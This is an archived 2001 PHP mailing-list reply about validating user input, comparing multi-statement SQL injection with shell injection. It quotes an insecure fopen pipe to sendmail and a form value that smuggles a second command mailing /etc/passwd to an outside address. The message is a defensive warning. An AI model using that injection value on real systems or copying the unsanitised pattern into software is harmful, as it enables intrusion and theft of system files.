Re: Re: Mommy, is it true that...?

From: Date: Fri, 21 Dec 2001 02:21:50 +0000
Subject: Re: Re: Mommy, is it true that...?
References: 1  Groups: php.general 
Request: Send a blank email to php-general+get-78389@lists.php.net to get a copy of this message
> At 06:03 PM 12/20/2001 -0800, Philip Hallstrom wrote: > > > I've done something similar in the past just for kicks, and I got the same > > > result you did (i.e. an error). I believe this is because mysql_query() > > > expects ONE query at a time and will break if you send two or more. I > > > could be completely and totally wrong about that, though (someone please > > > correct me if I am)... > > > >Maybe this one failed, but it's always a good idea to check user input. > >Let's say you're emailing a form and you don't use the mail() function, > >but make a call directly to sendmail... and you're sloppy... so you do > >this: > [...] > > True. But we were speaking specifically about MySQL. When you start > toying with external programs and exec() and so forth then you've opened up > a whole other can of worms security-wise... True, but why take the chance? :) I didn't see an equivalent for MySQL, but PostgreSQL has a pg_put_line() which just sends a NULL terminated string to the backend so you can do whatever you want (ie. multi statement). So in that case things could get messed up. > > >$fp = fopen("|/usr/bin/sendmail $sendto"); > >#write stuff to pipe to send email... > > > >Now... what if when I filled out the form I set $sendto equal to this: > > > >philip@adhesivemedia.com; /usr/bin/mail philip@adhesivemedia.com < /etc/passwd > > A definite possibility, but it does depend on the hacker in question > knowing exactly how your script is written... True, but in a shared hosting environment this is very likely. -philip

« previous php.general (#78389) next »